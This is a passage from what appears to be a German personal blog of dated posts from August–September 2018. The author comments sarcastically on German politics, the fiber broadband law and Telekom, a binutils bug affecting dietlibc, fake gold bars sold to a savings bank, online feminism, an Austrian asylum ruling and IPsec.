Cohn, a Wall Street veteran, tried to tamp down Trump’s strident nationalism regarding trade. According to Woodward, Cohn “stole a letter off Trump’s desk” that the president was intending to sign to formally withdraw the United States from a trade agreement with South Korea. Cohn later told an associate that he removed the letter to protect national security and that Trump did not notice that it was missing.
Ach komm, das merken die NIE!!1! :-)
Und wenig später hat er das nochmal mit einem NAFTA-Austritts-Brief gemacht.

Mon Sep 3 2018

[l] Gute Nachrichten: Berlin weiß, wie man die AfD bekämpft!
Es geht um den Ratskeller im Rathaus Charlottenburg, ein Restaurant, das an eine private Betreiberin verpachtet wird, oder besser wurde. Dort hat die AfD Treffen abgehalten. Das fanden die anderen "Demokraten" nicht so prall und haben daher opponiert, so z.B. der Baustadtrat Oliver Schruoffeneger von den Grünen:
„Wir bedauern sehr, dass sich der Pächter nicht auf unsere dringlichen Bitten einlässt, sich politisch mehr zurückzuhalten.“
Aber das ist natürlich nicht die offizielle Begründung dafür, dass die Bezirksverordnetenversammlung von ihrem Recht Gebrauch gemacht hat, den Pachtvertrag zum Jahresende zu beenden.
Man wolle in erster Linie die benachbarte Personalkantine im Rathaus schließen, die von der selben Pächterin betrieben wird. In den Räumen könnten dringend benötigte Verwaltungsbüros entstehen.
Oh ach soooo! Verstehe!
Angedacht sei auch, das Lokal für Veranstaltungen zur „Demokratieförderung“ zu nutzen, sagte Schruoffeneger.“
Aha, soso, Demokratieförderung also. Na dann.
Vielleicht denkt sich jetzt der eine oder andere Antidemokrat unter euch, hey, wenn die da die AfD reinlässt, dann hat die das nicht anders verdient. Nun, äh:
In dem Brief aus dem Juli beklagt ein Anwalt der Gastronomin, diese sei vertraglich dazu verpflichtet, alle „Vereinigungen und politischen Gruppierungen“ zu bewirten, die eine Fraktion in der BVV haben. AfD-Veranstaltungen beziehungsweise die rufschädigende öffentliche Kritik daran hätten zu „erheblichen Beeinträchtigungen“ für andere Gäste und die Mitarbeiter geführt.
Die wollte die AfD gar nicht in ihrem Restaurant haben. Und wenn ihr wissen wollt, von was für erheblichen Beeinträchtigungen sie spricht: Hier die "Pressemitteilung" der Antifa dazu.
Die einzige Partei neben der AfD, die sich gegen diese Kündigung gestellt haben, war übrigens ausgerechnet die FDP. (Danke, Jens)

Fri Aug 31 2018

[l] Tagesschau-Interview mit Justizministerin Barley. Wow. Das ist alles schlimm, aber hier ist der Teil, der mich am meisten ärgert:
Wir haben immer schon - und auch nicht nur Deutschland, sondern praktisch in allen Ländern - einen Bestand von Menschen, die anders ticken: die fremdenfeindlich sind, Rassisten sind, die Schwule abwerten, Antisemiten. Die gibt es in jeder Bevölkerung.
Ja genau! Die fallen vom Himmel, oder besser gesagt, die fallen so aus ihren Müttern raus! Da kann man nichts machen! Gendefekt, wissen Sie? Da hilft nur Hubschraubereinsatz und wegsperren!
Was ist mit denen, die empfänglich sind für solch ein Gedankengut, die aber noch nicht radikal sind?
ALLE SIND EMPFÄNGLICH FÜR SOLCH EIN GEDANKENGUT!
Daher blocken die Linken doch so knallhart alles weg, weil sie Angst haben, weil sie wissen, dass sie auch empfänglich sind. Wir sind alle empfänglich für Gedankengut. Das ist die Basis des Denkens in sozialen Gruppen.
Diese Ekelhaftigkeit, mit der Gestalten wie diese Quoten-Ministerin hier so tun, als seien diese Menschen da hinten halt kaputt und verloren und da hat niemand Verantwortung für und da kann man nichts machen, das ist der Grund, wieso es solche Leute überhaupt noch gibt bei uns. Weil da niemand mehr gemacht hat als Kopf in den Sand und Ausgrenzungspolitik! Schon bei der "Entnazifizierung" nach dem 2. Weltkrieg ging es ja eher halbherzig zur Sache. Ich glaube ja, das lag daran, dass alle frisch miterlebt hatten, dass es eben nicht ein paar Menschen mit einem Defekt im Hirn sind, die sich von totalitären Ideologien einfangen lassen, sondern das eine ganze Gesellschaft betreffen kann. Danach hat man dann Mythenbildung betrieben, wir waren ja alle im Widerstand und so weiter und so fort, aber das ist doch nicht die Realität!
Ausgrenzung und Problem ignorieren hilft nicht, das konnte man die letzten Jahre prima in den Niederlanden beobachten.
Wir brauchen hier mal einen Plan, wie wir Tribalismus und Gruppendruck überwinden, und eine pluralistische, diskursgetriebene Konsensgesellschaft aufbauen statt lauter Gruppen, die sich gegenseitig als Extremisten oder Mittäter bekämpfen.

Wed Aug 29 2018

[l] Zu T-Systems und Zumachen der ganzen Standorte habe ich noch eine Theorie.
Ich hatte im Mai oder so eine Veranstaltung, bei der ich Gelegenheit hatte, mich mit ein paar T-Systems-Leuten zu unterhalten. Das war auch gerade die heiße Phase der DSGVO-Einführung, und so kam das Gespräch darauf.
Daraufhin erzählte einer der T-Systems-Leute (und das war eine dieser Niederlassungen, ich glaube eine der kleineren, aber ich weiß nicht ob das eine derjenigen ist, die jetzt geschlossen werden sollen), dass die Telekom ja kürzlich festgestellt hätte, dass sie als Konzern mit der vollen Wucht der Milliarden-Strafen für Datenschutzverletzungen dran sind, und zwar nicht nur wenn T-Systems selbst eine Datenschutzverletzung macht, sondern auch wenn eine der unzähligen Niederlassungen oder die Ausgründung einer Niederlassung sowas macht. Dann haftet immer noch der Konzern, und die Strafe bemisst sich nach dem Konzernumsatz, nicht nach dem der Niederlassung.
Wir guckten uns alle an und dachten uns, oje, dann hat die Telekom aber möglicherweise ein größeres Problem jetzt. Und zwar nicht weil die Niederlassungen alle so schlecht sind, sondern überhaupt erstmal rauszufinden, für was sie da alles potentiell in der Haftung sind. Wer sich mal innerhalb von großen Firmen bewegt hat, weiß, dass da Prozesse im Allgemeinen mit gletscherhafter Geschwindigkeit ablaufen. Ich glaube einer in der Runde witzelte da noch, das würde ja Jahre dauern, bis man das entwirrt habe, um überhaupt sagen zu können, wieviel Risiko besteht.
Die naheliegende Theorie an dieser Stelle ist dann natürlich, dass deshalb jetzt die ganzen Niederlassungen zugemacht werden.
Und ich als Nicht-Jurist bin mir nicht mal sicher, ob die Prämisse überhaupt stimmt. :-)
Insofern wertet das mal als unsubstanziiertes Hörensagen-Geraune.

Sun Aug 26 2018

[l] In der aktuellen c't ist ein Artikel, nach dem ich endlich verstanden habe, wieso wir in Deutschland noch nicht überall Glasfaser in den Häusern und Wohnungen haben. Setzt euch mal bequem hin, da kriegt man echt Bluthochdruck von.
Also die Story ist die. Nehmen wir mal an, die Stadtwerke Hintertupfingen haben sich das mal durchgerechnet und wollen Glasfaser zu ihren Kunden verlegen. Die gehen also rum, rechnen sich aus, wie viele Kunden sie mindestens brauchen, machen Vorbereitung, machen Werbung unter den potentiellen Kunden, und 50% sind an Bord (man braucht wohl mindestens so 40%).
Und was passiert dann? Stellt sich raus: Für die Förderung des Glasfaserausbaus gibt es ein Gesetz, das Gesetz zur Erleichterung des Ausbaus digitaler Hochgeschwindigkeitsnetze (DigiNetzG). Da gibt es einen Paragraphen 77i, der folgenden Hintergedanken hat. Nehmen wir an, die Stadtwerke machen die Straße auf, um ein Gasleck zu reparieren. Dann dürfen Telcos kommen und die Gelegenheit nutzen und ihre Glasfasern verlegen, ohne sich am Straße-Aufmachen zu beteiligen. Und das ist der Großteil der Kosten.
Ihr ahnt sicher schon, wo die Story hingeht.
Die Stadtwerke Hintertupfingen machen also die Straße auf, um ihr hart auf Kante durchgerechnetes Glasfaserangebot umzusetzen, und dann kommt die Telekom, beruft sich auf §77i, und legt ihre Glasfasern daneben. Ohne sich an den Baukosten zu beteiligen. Und kann dann selbst Glasfaser wettbewerbsverzerrend für einen Bruchteil der Kosten anbieten und den Stadtwerken den Markt kaputtmachen.
Das Gesetz ist so beschissen verkackt formuliert, dass das legal ist. Herzlichen Glückwunsch, Herr Dobrinth!
Mit dem DigiNetz-Gesetz machen wir Deutschland fit für die Gigabit-Gesellschaft. In Zukunft gilt: Jede Baustelle bringt Bandbreite. Wer Verkehrswege oder Neubaugebiete erschließt, muss Glasfaserkabel direkt mitverlegen.
Lässt sich nach Strich und Faden verarschen, und merkt es nicht mal. Das Gesetz haben bestimmt Telekom-Lobbyisten, äh, -Berater "vorformuliert", und unsere an Inkompetenz kaum zu überbietenden geistig Unbewaffneten haben es übernommen.
Der Spiegel hatte das auch, aber wer liest heute noch den Spiegel :)
Oh, und die Telekom stellt sich auch noch als Monopol-Verhinderer dar in der Sache!
Es warnte davor "neue Gebietsmonopole aktiv zu fördern, indem man private Investoren von der Möglichkeit der Mitverlegung von Kabeln ausschließt, nur weil zumeist kommunale Unternehmen bereits eigenes Interesse angemeldet haben".
Oh und natürlich hat der zuständige Industrieverband der Politik das schon 2016 gesagt.
"Wir haben schon 2016 darauf hingewiesen, dass dieses Problem auftreten kann", sagt VATM-Chef Grützner. Auch der deutsche Landkreistag, der als kommunaler Spitzenverband viele Breitbandprojekte von Gemeinden betreut, hatte den Bundestag im Juni 2016 darauf hingewiesen, wie anfällig Paragraf 77i für Missbrauch ist.
So langsam wird es echt Zeit für die Fackeln und die Mistgabeln. Wo bleibt eigentlich die Revolution?
Update: Leserbrief:
Auch sehr beliebt ist folgende Methode den Glasfaserausbau zu verhindern:
Wie immer schreiben die von DSL-Lite geplagten Kommunen zuerst die Telekom an und bitte um Internet. Das wird dann dankend von der Telekom abgelehnt, weil es nicht rentabel ist. Jetzt planen die Kommunen ein Glasfasernetz, graben die Löcher und installieren die Knoten. Kurz bevor das Netz aber online geht findet die Telekom doch ein paar DSLAMs im Keller und baut die schnell auf. Das Netz wird hierzu nur auf das nötigste aufgebohrt.
Das Versprechen von 50 mbit/s sind für die meisten völlig ausreichend und wechseln aus Faulheit (Kündigungsfristen) nicht zur Fiber. Dann gehen die Komunalbetriebe pleite und der DSL Ausbau endet. Es werden nur genau so viele Kunden mit vDSL versorgt, wie nötig sind um die Komunalbetriebe zu ruinieren
Noch ein Leserbrief:
ich arbeiten im Bereich Tiefbau (Ingenieurbüro) und kann aus gemachten Erfahrungen eine Ergänzung zum Glasfaserausbau machen:
Wenn dann mal eine Kommune doch ihre Kabel verlegt bekommt, ohne dass die Telekom sich daneben legt (weil die einfach viel zu langsam reagiert haben...), ist aufgrund nicht vorhandener Fachkompetenz in der Kommune - das IB spart man sich - und mangelhafter bzw. fehlender Bauüberwachung - spart man sich auch - bei der Verlegung diese dann so schlecht, dass relegmässig die Kabel gerissen werden, wenn an der Örtlichen Infrastruktur gearbeitet wird (Erlebt: Kabel 20 cm unter dem Asphalt!). Zudem: Aussagefähige Bestandspläne? Auch gespart!
Und noch einer:
kenne den c't Artikel nicht im Detail, aber die praktische Gesetzregelung zeigt auch eindrucksvoll, wie ernsthaft in Deutschland am Glasfaserausbau gearbeitet wird.
Mein Vater kalkuliert für die Strabag hauptsächlich Straßen und Wege. Die müssen jedes Mal Bescheid geben, wenn sie irgendwo eine Straße aufmachen/neu bauen, damit die Anbieter gleich ihre Kabel verlegen können. Irgendwann soll schließlich überall mal Glasfaser verfügbar sein. Wenn also nicht jetzt, dann muss man später irgendwann ran an die Straße und es wird Geld kosten.
Aber hier im ländlichen Mecklenburg ist die Antwort der Telekom dann meist nicht "Danke für die Info, diese Chance lassen wir uns nicht entgehen", sondern fast immer "Ja ne lass mal, brauchen wir momentan nicht". Und so werden die Straßen dann ohne parallel verlegtes Breitbandkabel fertig gemacht.
Genaue Zahlen hab ich nicht, aber es passiert zumindest so oft, dass mein Vater sich bereits mehrfach drüber ausgelassen hat. Es ist für den gesunden Menschenverstand einfach nicht zu begreifen, weil die Alternativen ekelhaft sind. Entweder die Kabel werden später und wesentlich teurer verlegt oder sie werden gar nicht verlegt.
Aber ich will nicht meckern über die Telekom, wenns sein muss dann kann sie auch in Mecklenburg ganz schnell reagieren. Denn in Neustrelitz hatte man die Faxen dicke und baut sich jetzt selber Glasfaser (Strelix). Dauert nur ein bisschen und siehe da, die Telekom setzt alle Hebel in Bewegung um irgendwie vorher ihr "fortschrittliches" Vectoring anbieten zu können. Da legen die dann auch richtig Tempo an den Tag, Hauptsache man packt es irgendwie vor der entstehenden Konkurrenz.
Und noch ein Leserbrief:
ich bin kommunalpolitisch aktiv und habe darum die Möglichkeit mit kleinen Anfragen zu arbeiten. Zu TMG §77i habe ich dieses Jahr in meiner Kommune eine solche gestellt und war von den Antworten überrascht.
Kein TelKoAnbieter hat sich bisher bei uns dafür interessiert, weil unser Netz schon zu schnell ist, nämlich 30 MBit.
"Nach § 771 Abs. 6 TKG können Eigentümer und Betreiber öffentlicher Telekommunikationsnetze im Rahmen von Bauarbeiten passive Netzinfrastrukturen sowie Glasfaser mitverlegen. Da Greifswald mit derzeit bereitgestellten Bandbreiten von über 30 Mbit/s ausgestattet ist, ist die Aufgreifschwelle für das Bundesförderprogramm überschritten."
Mit anderen Worten: Wenn das Internet auf dem Stand von vor 10 Jahren vorhanden ist, dann muss auch nicht weiter verlegt werden.
Das Schlüsselwort ist aus meiner Sicht "Bundesförderprogramm". Die Telekom protzt ja immer damit herum, wieviel Glasfaser sie so verlegt, aber dass über Förderprogramme der Steuerzahler dafür zahlt, das erwähnen sie irgendwie nie.

Fri Aug 24 2018

[l] Leserbrief zum Hutbürger und dem Verhalten der Polizei bei Naziaufmärschen.
ich war als Journalist selbst für den NDR auf etlichen Nazidemos, Pegida, MV-gida, AfD, Wismar wehrt sich, Rostock wehrt sich, sonstigen rechten Demos. Jetzt liegt Mecklenburg-Vorpommern bei rechten Übergriffen wahrscheinlich nur dicht hinter Sachsen - hier habe ich aber ausschließlich positive Erfahrungen mit den Polizisten gemacht. Ein Beispiel war diese Nazi-Demo in Wismar.
Nachdem die Polizei mitbekam, dass ich gleich zu Anfang der Demo recht aggressiv angegangen wurde (ist im Beitrag zu sehen, wurde auch bespuckt usw.), stellte der Einsatzleiter mir zwei gut gepanzerte Polizisten ab, die immer mich und mein Team im Auge hatten, ohne mich an der Berichterstattung zu behindern. Im Gegenteil, bei 1:10 im Beitrag siehst Du, wie eine Polizistin eingreift, als einer der Teilnehmer kurz davor war, handgreiflich zu werden. Übrigens scheinen schlechte Mützen und komische Sonnenbrillen bei Teilnehmern rechter Demos recht häufig vorzukommen.
Das Video ist übrigens echt lustig, ab 1:36 hat sich jemand in der Demo geirrt und ab 2:00 sieht man Nazis und Gegendemonstranten sich gegenseitig als "Nazischweine" anbrüllen. Lolwut

Thu Aug 23 2018

[l] Eigentlich wollte ich mal wieder eine neue dietlibc-Version releasen, aber es mit den aktuellen Release-binutils kriegen dietlibc-Programme im Startup-Code einen Segfault und stürzen ab. Der abstürzende Code will Thread Local Storage initialisieren. Dafür muss man durch die ELF Program Header iterieren. Die sind Teil des Binaries und werden normalerweise mit in den Speicher gemappt. Man findet sie, indem man den ELF auxvec durchläuft, der als eines der Key-Value-Paare einen Zeiger darauf beinhaltet. Mein Code findet diesen Zeiger und stürzt dann beim Dereferenzieren ab.
Stellt sich raus: Die Program Header sind nicht mehr gemappt. Das Mappen macht der Kernel, aber der richtet sich nach den Werten im ELF-Header, und zwar genau den ELF Program Headers. Die aktuelle binutils-Version 2.31.1 trägt da aber den falschen Wert ein, und die ELF-Header werden dann vom Kernel nicht gemappt. Daraufhin stürzt das ab.
Ich habe einen Bug gefiled, und es stellt sich raus: War bekannt und ist im CVS behoben, aber gibt noch kein neues Release. Gut, habe ich mir also die aktuelle git-Version von binutils installiert. Damit kommen wieder lauffähige Binaries raus. Aber die sind doppelt so groß.
Das frisst mich ja jetzt doch mehr an, als es sollte. Ich hab hier Jahre damit verbracht, einzelne Bytes rauszuoptimieren, und dann kommt ein binutils und bloatet mir mal eben eine Verdoppelung der Dateigröße rein!?
Übrigens, falls ihr das nicht kennt: Unter Unix kann man size binary sagen, das funktioniert auch auf Shared Libraries, Object Files und sogar .a-Libraries. Der zeigt einem die Größe der Segmente in den ELF-Headern. Ich habe hier zufällig noch ein Binary vom Mai rumfliegen, mit früheren Versionen gebaut. Das ist 9k groß. Die neu gebaute Version ist 17k groß. Aber size zeigt, dass Code und Daten praktisch gleich groß sind. Das ist also alles irgendein Header-Bloat oder Alignment-Scheiß. Ich hoffe mal, dass man das wieder abschalten kann. Ich habe mal noch einen Bug aufgemacht.
Mich ödet das schon länger an, wenn Leute so "ach komm, RAM ist billig, Plattenspeicher kostet nichts mehr"-Dinge tun. Das ist eine Frage von Respekt sich selbst, dem Problem, anderer Leuten und der Maschine gegenüber, finde ich, dass man keinen unnötigen Bloat verteilt.

Sun Aug 19 2018

[l] US-Grenzer behandeln weibliche Passagiere entmenschlichend.
As a second female officer observed, hand on her firearm, the lawsuit says, the first officer touched Lovell “from head to toe” before ordering her to squat. Lovell was clothed, but the lawsuit claims that the officer squeezed Lovell’s breasts, and, “placed her right hand into [Lovell’s] pants ‘forcibly’ inserting four gloved fingers into plaintiff’s vagina” before parting Lovell’s buttocks “for viewing.”
Das klingt jetzt natürlich echt ekelig, aber man muss auch im Auge behalten, dass Brüste und Vagina schon als Drogenschmuggelort verwendet wurden. Mir ist gerade nicht so ganz klar, was die Grenzer jetzt tun sollen. Die Bodyscanner haben ihre eigenen Probleme und penetrieren nicht die Haut AFAIK, d.h. würden in beiden Fällen nicht helfen. Ich will solche Abtastmethoden nicht schönreden, aber man muss zumindest anerkennen, dass es hier einen legitimen Zielkonflikt gibt. Es ist nicht notwendigerweise so, dass da ein Sadist völlig anlassfrei zur eigenen Befriedigung rumgrabbelt.
Die Bescherdeführerin ist übrigens schwarz und hat zum wiederholten Mal Urlaub in Jamaica gemacht. Ich nehme an, dass das genau auf den typischen weiblichen Drogenschmuggler passt, und die Grenzer halt Racial Profiling gemacht haben, bzw. ihre ermittlungstechnische Erfahrung angewandt haben, weil das genau das verdächtige Muster ist.
Wo bleiben eigentlich die aufgebrachten Zeitungsberichte über unsanft begrabbelte Männer am Flughafen?
Update: Die Formulierung ist nicht klar genug. Ich wollte damit sagen, dass das nicht nur ein Chaotic Evil Arschloch am Flughafen ist, der euren Zorn verdient hat, sondern das ist ein Lawful Evil Arschloch, das existierende Regeln des Schweinesystems umsetzt.
[l] Saudi-Arabische Feministen haben jetzt ein Internet-Radio aufgemacht. Hoffentlich aus dem Ausland, sonst wird das vermutlich nur kurz on air bleiben.

Fri Aug 17 2018

[l] Aus der beliebten Kategorie "Einmal mit Profis arbeiten", heute: 18jähriger verkauft der Sparkasse Göttingen 259 falsche Goldbarren. Nicht auf einmal. Anfangs nur ein paar, dann immer mehr. Insgesamt hat der über 300k€ rausgetragen. Das flog erst auf, als seine Mutter auch anfing.
Im September 2016 tauchte der junge Mann, Realschulabsolvent, inzwischen 20, zum ersten Mal in der Kasse mit Barren auf, die er sich über die Internetplattform Ebay mutmaßlich in China besorgt hatte (er selbst sagt nichts, er verweigert die Aussage). In China kann man Metallbarren – Kupfer, Messing oder Wolfram mit hauchdünnem Goldüberzug und täuschend echter Goldbarrenverpackung – für wenig Geld erstehen. Elfmal hat der Göttinger Goldjunge laut Oberstaatsanwalt Andreas Buick der Sparkasse sein Fake-Gold angedreht, in Form von 259 nachgemachten Barren und zwei nachgemachten Krügerrand-Münzen.
Wow. Und die Sparkasse rief den dann irgendwann an, ob er nicht noch mehr Gold hätte. Hatte er.
Wartet, wird noch besser! Die Sparkasse hat die Barren weiterverkauft, u.a. an die Nord/LB. Ein anderer Teil ist eingeschmolzen worden. Wo und wie ist noch nicht klar. m(
Update: Einem Leser fällt zu dem "hast du noch mehr davon"-Aspekt auf:
Weißt du woran mich das erinnert? Genau! An Konrad Kujau und die Hitler-Tagebücher.
(Danke, Dennis)

Thu Aug 16 2018

[l] Meine Ausführungen zu DNS und Komplexität sind, wie sich herausstellt, keine Einzelposition. Der Typ hat sich aber viel mehr Arbeit gemacht und schöne Grafiken erstellt, die das Problem eindrucksvoll visualisieren. (Danke, Peter)
[l] Wieso geht von Netzfeministen eigentlich so viel strukturelle Gewalt aus?
Und wie schaffen die das, sich einerseits als Rechtfertigung für ihr Mobbing und Bullying in einer Linie mit denen zu sehen, die für Abtreibungs-Legalisierung und rechtliche Gleichstellung der Frau gekämpft haben, aber dann aber andererseits brutal gegen Alice Schwarzer und Emma zu kanten, die das wirklich getan haben?
Mir ist ja die Tage dieser alte Emma-Artikel über die Netzfeministen-Hassmobber per Mail reingespült worden, und den habe ich bei der Gelegenheit zum ersten Mal gelesen. Der ist von Januar 2017, und damals hab ich in der Ferne Fäkalien fliegen sehen aber interessierte mich nicht für die Details. Ich bin nicht gerade ein Emma-Leser und halte Alice Schwarzer für nicht satisfaktionsfähig, spätestens seit sie für die "Bild" Werbung gemacht hat (aber auch ihre Haltung zu Pornographie und Prostitution fand ich immer zu fundamentalistisch). Aber hey, war nie meine Baustelle.
Jetzt habe ich den Artikel mal gelesen und konnte da keinerlei Schmähkritik finden. Der ist sogar halbwegs sachlich, insbesondere für Emma-Verhältnisse.
Und hey, ich habe mindestens eine Sache gelernt aus dem Artikel, die ich vorher nicht wusste:
Die einzige wahre Wahrheit wird vorgegeben. Diskussionen sind nicht erlaubt. Unabgesichertes Denken schon gar nicht. Jede noch so geringe Abweichung wird im Keim erstickt. Was bedeutet: Stagnation und Sterilität.
Das alles ist nicht neu. In den 1970er Jahren hieß diese Art von Stellvertreter-Politik „Klassenwiderspruch geht vor Geschlechterwiderspruch“ und lautete die ultimative Disqualifizierung „bürgerliche Feministin“ oder „Reformistin“.
Oh wow. Das wusste ich nicht. Ich hielt das für ein neues Phänomen, diese Infighting, diese Zersetzungs-Maßnahmen wie aus einem CIA-Handbuch.
Ich stelle mir bei sowas immer vor, es gäbe ein Patriarchat, und ich solle für die eine Strategie entwickeln, wie man den Feminismus klein und irrelevant hält. Das wäre die Strategie. Bringt sie dazu, sich gegenseitig zu bekämpfen. Nehmt Themen wie Transsexuelle und Burkas und bringt die Fraktionen gegeneinander auf. Dann setze dich auf die Tribüne und halte Popcorn bereit.
Nur langsam geht von den Streitern so viel verbale Gewalt in alle Richtungen aus, dass man sich Gedanken über eine Exit-Strategie machen sollte. Vielleicht eine Aussteiger-Hotline anbieten oder so.
In einem Gespräch mit Freunden dazu wurde ich gefragt, wieso ich das überhaupt lese. Aus dem selben Grund, wieso ich Videos von Jordan Peterson gucke. Ich will das tun, was ich anderen empfehle: die Aussagen von Anderen wohlwollend interpretieren. Das hat bei Jordan Peterson übrigens Erstaunliches bewirkt. Seine Thesen wirkten alle irgendwie konservativ auf mich. Dann merkte ich eines Tages, dass nicht seine Thesen konservativ sind, sondern dass er genau die Grundthesen des Konservatismus vertritt. Interessanterweise schon auf eine Art, die selbst wohlwollend interpretiert. Anstatt von göttlicher Vorsehung spricht er davon, dass diese Strukturen ja Ergebnis einer Evolution sind, und man sie daher nicht einfach verwerfen solle, bevor man sich sicher ist, verstanden zu haben, wieso sie so entstanden sind, und welche Funktionen sie erfüllen. Statt von der natürlichen Ungleichheit der Menschen redet er von Kompetenzhierarchien und Pareto-Distributionen. Und so hat Peterson es als erster geschafft, dass ich die Grundthesen des Konservatismus gehört habe, ohne schon bei der ersten Erwährung von Gott oder der Bibel das Tab zu schließen.
Ich gönne euch allen von Herzen, dass ihr auch mal eine solche Erfahrung macht. Einen Standpunkt, den ihr immer als offensichtlich bescheuert wegignoriert habt, mal durch wohlwollende Interpretation aus anderer Sicht zu sehen. Das Hirn schüttet Glückshormone aus, wenn man es mal ohne ideologische Scheuklappen denken lässt.
Es ist auch egal, um welchen Standpunkt es dabei geht. Ich würde mir auch gerne mal eine wohlwollende Interpretation des Netzfeminismus erarbeiten, aber bei Aussagen wie
Fefe ist schon lange kompletter Trash
oder
niemand nimmt Fefe ernst LOL
und
Menschen wie Hadmut Danisch und Fefe müssen einfach bekämpft werden.
Hatte heute Morgen die Idee einen Blog zu starten, der quasi als Anti-Fefe alle Geschichten sammelt, in denen weiße cis Männer Trash sind. Aber dann fiel mir ein das gibt es schon, dazu muss ich nur in die Zeitung gucken. #menaretrash
gelingt es mir nicht, eine wohlwollende Interpretation zu finden. Vielleicht kann mir ja jemand von euch helfen.
[l] Noch ein Leserbrief zu mobbenden Direktoren in der Forschung:
zu der Max-Planck-Geschichte würde ich gerne ergänzen, dass es an der ETH Zürich letztes Jahr einen ganz ähnlichen Skandal gab: Eine Professorin am Institut für Astronomie hat über Jahre hinweg ihre Doktoranden gemobbt.
Money Quote:
"Ein weiterer Doktorand, heute ebenfalls nicht mehr an der ETH, erinnert sich an eine andere Sitzung. Eigentlich galt das Treffen dem Zweck, bevorstehende wissenschaftliche Papiere zu besprechen. Stattdessen wurde sie von Gabriela M. auf persönlicher Ebene angegangen. Sie habe gedroht: «Ihr seid wie Hausangestellte. Wenn meine Hausangestellte ihren Job nicht erledigt, dann feuere ich sie.»"
Dieses Zitat beschreibt die Situation sehr gut. Die Doktoranden sind ihren Professoren ausgeliefert. Doktoranden bekommen an der ETH Zürich - so wie an andern Hochschulen auch - immer nur befristete Verträge für ein Jahr. Dann kann der Professor nach Gusto entscheiden, ob er den Vertrag um ein weiteres Jahr verlängert oder nicht.
Die entsprechende Professorin ist mittlerweile beurlaubt und das Institut für Astronomie wurde still und heimlich aufgelöst. Nachdem die Zeitung "NZZ am Sonntag" von der Sache Wind bekommen hat und sie im Oktober 2017 publik gemacht hat, wurde auch eine Administrativuntersuchung gegen die Professorin eingeleitet. Diese zeitliche Korrelation ist natürlich reiner Zufall.
Zitat: "Der Entscheid von dieser Woche, doch eine Untersuchung zu lancieren, sei nicht aufgrund des medialen Drucks erfolgt."
Wenig überraschend ist diese Professorin kein Einzelfall. Mittlerweile wird gegen drei weitere Professoren ermittelt.
Im Herbst 2017 hat der AVETH (Interessensverband für das wissenschaftliche Personal der ETH) unter den Doktoranden eine Umfrage zu den Betreuungsbedingungen durchgeführt.
Ergebnis:
"An beiden Hochschulen [ETH Zürich und Universität Zürich] gaben rund 25% der Teilnehmenden an, dass sie mindestens einmal das Gefühl hatten, dass ihre Betreuungsperson seine bzw. ihre Machtstellung missbraucht hatte. Häufig genannte Beispiele von Machtmissbrauch waren: unbezahlte Arbeit, unfaire Verhandlung bei Vertragsverlängerung und Kettenverträge, lange Arbeitszeiten, Arbeit an Abenden und Feiertagen, Verweigerung von Urlaub und das allgemeine Gefühl, unfair behandelt zu werden. 7% gaben an, dass sie Angst hätten, Probleme anzusprechen oder Hilfe zu suchen."
Beim Max-Planck-Institut gibt es inzwischen ein Positionspapier des PhDnet. Das scheint eine Interessenvertretung der Doktoranden zu sein. Und Interessenvertretungen (Gewerkschaften, Betriebsräte, was auch immer) sind ein häufiger Lösungsvorschlag in den Mails, die hier gerade reinkommen. Vielleicht braucht man an der Stelle ja auch Demokratie. Direktoren müssen sich Wahlen stellen. Oder vielleicht braucht man externe Kontrollinstanzen (wobei das natürlich auch potentielle Probleme hat).

Wed Aug 15 2018

[l] Kennt ihr den schon? Österreich hat Asyl für einen jungen Afghanen abgelehnt. Der hatte vorgebracht, er sei homosexuell und dafür drohe ihm daheim Verfolgung und Tod. Also hat der Sachbearbeiter in der österreichischen Asylbehörde mal geprüft, ob der wirklich schwul ist.
Die Prämisse ist ja schon filmwürdig. Man stellt sich vor, dass man hübsche Frauen vorbeilaufen lässt und dabei seine Hirnwellen misst oder so. Aber nein. Soviel Budget hat die Behörde nicht. Hier sind Zitate aus der Ablehnungsbegründung:
Es wird berichtet, dass Sie öfter Auseinandersetzungen mit anderen Zimmergenossen hatten. Ein Aggressionspotential ist bei Ihnen also vorhanden, das bei Homosexuellen nicht zu erwareten wäre. Freunde hätten Sie nicht sehr viele, stehen in dem Bericht ebenso. Sind Homosexuelle nicht eher gesellig?
Moment, geht noch weiter!
Dass Sie nicht homosexuelle Jungs geküsst hätten, sogar viele davon, ist absoluter Unsinn (Seite 15). Sie hätten das im Spaß gemacht, behaupten Sie. Hätten Sie das tatsächlich bei einem nicht homosexuellen Jungen gemacht, dann hätten Sie furchtbare Prügel bezogen. Kein Mann lässt sich von einem anderen Mann küssen, wenn er nicht homosexuelle ist. Das ist völlig undenkbar.
Ausnahmen bestätigen die Regel.
Weder Ihr Gang, Ihr Gehabe oder Ihre Bekleidung haben auch nur annähernd darauf hingedeutet, dass Sie homosexuell sein könnten.
Liebe Homosexuelle, lasst euch das eine Lektion sein. Österreich lässt nur tuntige Schwule rein, am besten Drag Queens!1!!

Tue Aug 14 2018

[l] Benutzt hier jemand IPsec? IPsec selbst ist nicht so schlimm, aber wie bei allen Kryptosystemen verschiebt sich damit das Problem bloß auf den Schlüsselaustausch, und der ist bei IPsec alt und angegammelt und wird dynamisch über IKEv1 und IKEv2 gemacht.
Mein Gefühl dazu ist, dass IKE sich zu TLS verhält, wie S/MIME sich zu PGP verhält.
Insofern war ich ganz froh, dass jemand an was neuem arbeitet. Das ist im Moment ein Linux-Alleingang, dafür ist es AFAIK im Standardkernel angekommen. Ich habe damit noch nicht herumgespielt, aber beim oberflächlichen gucken her gingen da erstmal keine Alarmlampen an.
[l] Ach gucke mal, na sowas! In den USA hat eine Title-IX-Untersuchung eine feministische Professorin an der NYU erwischt!
Title IX ist eine bürokratische Regelung, mit der ursprünglich bewirkt werden sollte, dass durch die Sportförderung an Unis nicht nur Männer begünstigt werden, sondern auch Frauen. Ein Gleichstellungsparagraph für Unis. Wenn eine Uni sich nicht daran hält, dann kann die US-Bundesregierung ihr sämtliche Zuschüsse und Förderungen aberkennen, und das ist eine existenzbedrohende Aussicht für viele Unis.
Seit dem ist Title IX aber immer ausgeweiteter angewendet worden und ist heute sowas wie "Schwerer Landfriedensbruch" in Deutschland: Ein Instrument der Nötigung. Diese Änderung geht zurück auf eine Supreme Court-Entscheidung in den 90ern:
Title IX applies to all educational programs and all aspects of a school's educational system. In the 1990s, the U.S. Supreme Court issued three decisions clarifying that Title IX requires schools to respond appropriately to reports of sexual harassment and sexual violence against students.
